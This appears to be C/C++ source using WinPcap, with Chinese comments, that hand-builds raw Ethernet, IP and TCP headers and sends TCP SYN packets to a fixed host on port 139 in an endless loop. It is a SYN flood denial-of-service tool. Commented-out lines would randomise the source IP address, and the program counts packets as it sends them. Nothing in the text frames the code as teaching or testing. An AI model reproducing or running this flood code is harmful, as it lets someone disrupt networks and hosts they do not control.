pocket

#pragma pack(1) 
 
typedef struct mac_address{ 
    u_char byte1; 
    u_char byte2; 
    u_char byte3; 
    u_char byte4; 
	u_char byte5; 
    u_char byte6; 
}mac_address; 
 
typedef struct ip_address{ 
    u_char byte1; 
    u_char byte2; 
    u_char byte3; 
    u_char byte4; 
}ip_address; 
 
typedef struct tcp_header              //定义TCP首部  
{  
	USHORT	p_01_th_sport;                    //16位源端口  
	USHORT	p_02_th_dport;                    //16位目的端口  
	UINT	p_03_th_seq;                //32位序列号  
	UINT	p_04_th_ack;                //32位确认号  
	UCHAR	p_05_th_lenres;            //4位首部长度/6位保留字  
	UCHAR	p_06_th_flag;              //6位标志位  
	USHORT	p_07_th_win;               //16位窗口大小  
	USHORT	p_08_th_sum;               //16位校验和  
	USHORT	p_09_th_urp;               //16位紧急数据偏移量 
	INT64	p_10_option; 
	 
}tcp_header;  
 
typedef struct psd_header              //定义TCP伪首部  
{  
	//unsigned long p_1_saddr;                //源地址  
	//unsigned long p_2_daddr;                //目的地址  
	ip_address p_1_saddr; 
	ip_address p_2_daddr; 
	char p_3_mbz;						//填充0  
	char p_4_ptcl;                          //协议类型  
	unsigned short p_5_tcpl;                //TCP长度 
	tcp_header	p_6_tcp; 
}psd_header;  
 
typedef struct ip_packet{ 
	u_char  p_01_ver_ihl;      // 版本 (4 bits) + 首部长度 (4 bits):0x45 
    u_char  p_02_tos;            // 服务类型(Type of service) :0x00 
    u_short p_03_tlen;           // 总长(Total length) 
    u_short p_04_identification; // 标识(Identification) 
    u_short p_05_flags_fo;       // 标志位(Flags) (3 bits) + 段偏移量(Fragment offset) (13 bits) 
    u_char  p_06_ttl;            // 存活时间(Time to live) 
    u_char  p_07_proto;          // 协议(Protocol) 
    u_short p_08_crc;            // 首部校验和(Header checksum) 
    ip_address  p_09_sip;		// 源地址(Source address) 
    ip_address  p_10_dip;		// 目的地址(Destination address) 
    //u_int   p_11_op_pad;         // 选项与填充(Option + Padding) 
	tcp_header	p_11_tcp; 
}ip_packet; 
 
typedef struct eth_packet{ 
	mac_address	p_1_dmac; 
	mac_address	p_2_smac; 
	u_short	p_3_type; 
	ip_packet p_4_ip; 
}eth_packet; 
 
#pragma pack(pop)

 
 
#include "pcap.h"    
#include "packet.h"    
#include "iostream.h"    
#include "time.h"    
   
void syn_fake(UINT n);   
USHORT checksum(USHORT *buffer, int size);   
   
u_char *PacketBuf= new u_char[100];   
eth_packet *p=(eth_packet *)PacketBuf;   
psd_header *psd = new psd_header;   
USHORT old_crc=0;   
   
void main()   
{   
    pcap_if_t *alldevs;   
    pcap_if_t *d;   
    int i=0;   
    int inum=0;   
    char errbuf[PCAP_ERRBUF_SIZE];   
       
    /* Retrieve the device list */   
    if (pcap_findalldevs(&alldevs, errbuf) == -1)   
    {   
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);   
        return;   
    }   
       
    /* Print the list */   
    for(d=alldevs;d;d=d->next)   
    {   
        printf("%d. %s", ++i, d->name);   
        if (d->description)   
            printf(" (%s)\n", d->description);   
        else            printf(" (No description available)\n");   
    }   
       
    if(i==0)   
    {   
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");   
        return;   
    }   
       
    printf("Enter the interface number (1-%d):",i);   
    scanf("%d", &inum);   
       
    if(inum < 1 || inum > i)   
    {   
        printf("\nInterface number out of range.\n");   
        /* Free the device list */   
        pcap_freealldevs(alldevs);   
        return;   
    }   
       
    /* Jump to the selected adapter */   
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);   
       
    /* Open the adapter */   
    pcap_t *adhandle;   
    if ( (adhandle= pcap_open_live(d->name, // name of the device    
        100,        // portion of the packet to capture. 65536 grants that the whole packet will be captured on all the MACs.    
        1,          // promiscuous mode    
        1000,       // read timeout    
        errbuf      // error buffer    
        ) ) == NULL)   
    {   
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n");   
        /* Free the device list */   
        pcap_freealldevs(alldevs);   
        return;   
    }   
       
    /* 检查数据链路层，为了简单，我们只考虑以太网 */   
    if(pcap_datalink(adhandle) != DLT_EN10MB)   
    {   
        fprintf(stderr,"\nThis program works only on Ethernet networks.\n");   
        /* 释放设备列表 */   
        pcap_freealldevs(alldevs);   
        return;   
    }   
    pcap_freealldevs(alldevs);   
   
    cout << "sending..." << endl;   
   
    //目的MAC    
    p->p_1_dmac.byte1=0x00;   
    p->p_1_dmac.byte2=0x00;   
    p->p_1_dmac.byte3=0xf0;   
    p->p_1_dmac.byte4=0x79;   
    p->p_1_dmac.byte5=0xc6;   
    p->p_1_dmac.byte6=0xd1;   
       
    //源MAC    
    p->p_2_smac.byte1=0x00;   
    p->p_2_smac.byte2=0x0c;   
    p->p_2_smac.byte3=0x29;   
    p->p_2_smac.byte4=0xd6;   
    p->p_2_smac.byte5=0x9c;   
    p->p_2_smac.byte6=0x83;   
       
    //类型:IP    
    p->p_3_type=0x0008;   
       
    //IP报头固定字段    
    p->p_4_ip.p_01_ver_ihl=0x45;   
    p->p_4_ip.p_02_tos=0x00;   
    p->p_4_ip.p_03_tlen=0x3000;     
    p->p_4_ip.p_05_flags_fo=0x40;   
    p->p_4_ip.p_06_ttl=128;   
    p->p_4_ip.p_07_proto=6;   
    p->p_4_ip.p_08_crc=0x0000;   
       
    //目的IP    
    p->p_4_ip.p_10_dip.byte1=10;   
    p->p_4_ip.p_10_dip.byte2=200;   
    p->p_4_ip.p_10_dip.byte3=8;   
    p->p_4_ip.p_10_dip.byte4=63;   
       
    //TCP目的端口    
    p->p_4_ip.p_11_tcp.p_02_th_dport=htons(139);   
       
    //TCP报头其余固定字段    
    p->p_4_ip.p_11_tcp.p_04_th_ack=0x00;   
    p->p_4_ip.p_11_tcp.p_05_th_lenres=112;   
    p->p_4_ip.p_11_tcp.p_06_th_flag=0x02;   
    p->p_4_ip.p_11_tcp.p_07_th_win=htons(65535);   
    p->p_4_ip.p_11_tcp.p_08_th_sum=0x00;   
    p->p_4_ip.p_11_tcp.p_09_th_urp=0x00;   
    p->p_4_ip.p_11_tcp.p_10_option=0x02040101b4050402;   
       
    //TCP伪报头固定部分    
    psd->p_2_daddr.byte1=p->p_4_ip.p_10_dip.byte1;   
    psd->p_2_daddr.byte2=p->p_4_ip.p_10_dip.byte2;   
    psd->p_2_daddr.byte3=p->p_4_ip.p_10_dip.byte3;   
    psd->p_2_daddr.byte4=p->p_4_ip.p_10_dip.byte4;   
    psd->p_3_mbz = 0;   
    psd->p_4_ptcl = 6;   
    psd->p_5_tcpl = htons(sizeof(p->p_4_ip.p_11_tcp));       
    psd->p_6_tcp.p_02_th_dport=p->p_4_ip.p_11_tcp.p_02_th_dport;     
    psd->p_6_tcp.p_04_th_ack=0x00;   
    psd->p_6_tcp.p_05_th_lenres=112;   
    psd->p_6_tcp.p_06_th_flag=0x02;   
    psd->p_6_tcp.p_07_th_win=htons(65535);   
    psd->p_6_tcp.p_08_th_sum=0x00;   
    psd->p_6_tcp.p_09_th_urp=0x00;   
    psd->p_6_tcp.p_10_option=0x02040101b4050402;   
       
    int n=1;   
    while(1)   
    //for (int m=0;m<5;m++)    
    {   
        syn_fake(clock());   
        pcap_sendpacket(adhandle,PacketBuf,sizeof(eth_packet));   
        cout << "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b" << n++ << " packets send!";   
    }   
}   
   
void syn_fake(UINT n)   
{   
    //引入时间作为随机数种子，使用上一次的CRC随机化重复的随机值    
    srand(n);   
   
    //源ip    
    p->p_4_ip.p_09_sip.byte1=10;   
    p->p_4_ip.p_09_sip.byte2=200;   
    p->p_4_ip.p_09_sip.byte3=9;   
    p->p_4_ip.p_09_sip.byte4=187;   
    //p->p_4_ip.p_09_sip.byte2=rand()%255+old_crc-1;    
    //p->p_4_ip.p_09_sip.byte3=rand()%255+old_crc-1;    
    //p->p_4_ip.p_09_sip.byte4=rand()%255+old_crc-1;    
       
    if (p->p_4_ip.p_09_sip.byte4==0)   
        p->p_4_ip.p_09_sip.byte4=123;   
       
    //IP序列号    
    p->p_4_ip.p_04_identification=old_crc;   
       
    //校验和    
    p->p_4_ip.p_08_crc=0x00;   
    p->p_4_ip.p_08_crc=checksum((USHORT *)(PacketBuf+14),20);   
       
    //TCP端口和序列号    
    p->p_4_ip.p_11_tcp.p_01_th_sport=htons(1000+old_crc%8000);   
    p->p_4_ip.p_11_tcp.p_03_th_seq=p->p_4_ip.p_08_crc*0x10000+p->p_4_ip.p_08_crc;   
   
    //TCP伪报头    
    psd->p_1_saddr.byte1=p->p_4_ip.p_09_sip.byte1;   
    psd->p_1_saddr.byte2=p->p_4_ip.p_09_sip.byte2;   
    psd->p_1_saddr.byte3=p->p_4_ip.p_09_sip.byte3;   
    psd->p_1_saddr.byte4=p->p_4_ip.p_09_sip.byte4;   
    psd->p_6_tcp.p_01_th_sport=p->p_4_ip.p_11_tcp.p_01_th_sport;   
    psd->p_6_tcp.p_03_th_seq=p->p_4_ip.p_11_tcp.p_03_th_seq;   
   
    //校验和    
    p->p_4_ip.p_11_tcp.p_08_th_sum = checksum((USHORT *)(psd), sizeof(psd_header));   
   
    //保存CRC    
    old_crc=p->p_4_ip.p_11_tcp.p_08_th_sum;   
}   
   
USHORT checksum(USHORT *buffer, int size)   
{   
    unsigned long cksum=0;   
    while(size >1)   
    {   
        cksum+=*buffer++;   
        size -=sizeof(USHORT);   
    }   
    if(size)   
        cksum += *(UCHAR*)buffer;   
    cksum = (cksum >>16) + (cksum &0xffff);   
    cksum += (cksum >>16);   
    return (USHORT)(~cksum);   
}